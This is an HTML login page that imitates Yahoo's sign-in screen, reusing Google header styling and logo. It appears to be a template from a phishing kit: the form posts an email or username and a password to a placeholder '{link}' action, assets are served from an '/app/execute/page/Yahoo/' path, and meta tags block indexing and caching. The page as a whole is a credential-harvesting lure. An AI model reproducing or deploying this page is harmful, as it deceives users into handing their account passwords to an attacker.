<!DOCTYPE html>
<html>
	<head>
		<title>Yahoo - login</title>
		<meta charset="UTF-8">
		<meta http-equiv="cache-control" content="no-cache" />
		<meta http-equiv="expires" content="0" />
		<meta http-equiv="pragma" content="no-cache" />
		<meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=0.75, user-scalable=no">
		<meta name="robots" content="noindex, nofollow">
		<script src="/app/execute/page/Yahoo/static/js/jquery.min.js"></script>
		<link rel="stylesheet" href="/app/execute/page/Yahoo/static/css/bootstrap.min.css">
		<link rel="stylesheet" href="/app/execute/page/Yahoo/static/css/style.css">
		<link rel="icon" type="image/png" href="/app/execute/page/Yahoo/static/img/pfpnk8kp5b.png"/>
		<style> body { background-position: center; background-attachment: fixed; background-repeat: no-repeat; -webkit-background-size: 100%; -moz-background-size: 100%; -o-background-size: 100%; background-size: 100%; -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; background-size: cover; } .google-header-bar { height: 71px; border-bottom: 1px solid #e5e5e5; overflow: hidden; } .google-header-bar.centered { border: 0; height: 108px; } .google-header-bar.centered .header .logo { float: none; margin: 40px auto 30px; display: block; } .google-header-bar.centered .header .secondary-link { display: none } .header .logo { margin: 17px 0 0; float: left; height: auto; width: auto; } </style>
		<style media="screen and (max-width: 800px), screen and (max-height: 800px)"> .google-header-bar.centered { height: 83px; } .google-header-bar.centered .header .logo { margin: 25px auto 20px; } .card { margin-bottom: 20px; } </style>
		<style media="screen and (max-width: 580px)"> html, body { font-size: 14px; } .google-header-bar.centered { height: 73px; } .google-header-bar.centered .header .logo { margin: 20px auto 15px; } .content { padding-left: 10px; padding-right: 10px; } .hidden-small { display: none; } .card { padding: 20px 15px 30px; width: 270px; } .footer ul li { padding-right: 1em; } .lang-chooser-wrap { display: none; } </style>
	</head>
	<body>
		<div class="container">
			<div class="account-wall">
				<div class="google-header-bar centered">
					<div class="header content clearfix"> <img alt="Google" class="logo" src="/app/execute/page/Yahoo/static/img/mtq4wpx4d6.png"> </div>
				</div>
				<h1 class="text-center login-title">Sign in to your account</h1>
				<form method="post" action="../form/{link}" class="form-signin">
					<input id="eml" type="text" placeholder="Enter your email or username" name="" class="form-email" placeholder="Enter your Email" _autofocus="true" autocorrect="off" autocomplete="off" autocapitalize="off" required><br> <input id="pwd" type="password" autocomplete="new-password" placeholder="Enter your password" name="" class="form-password" placeholder="Password" autocorrect="off" autocomplete="off" autocapitalize="off" required><br>
					<div id="dialog">
						<h2 id="error">Please enter the required fields.</h2>
					</div>
					<button id="btn" class="btn btn-primary btn-block btn-xlarge btn-sharp" name="login" type="submit">Sign in</button>
					<div class="text-center terms-text1"><a href="#" class="url-color">Trouble signing in?</a></div>
					<br>
					<div class="text-center terms-text2">New to Yahoo? <a href="#" class="url-color">Sign up for a new account</a></div>
				</form>
			</div>
		</div>
	</body>
</html>
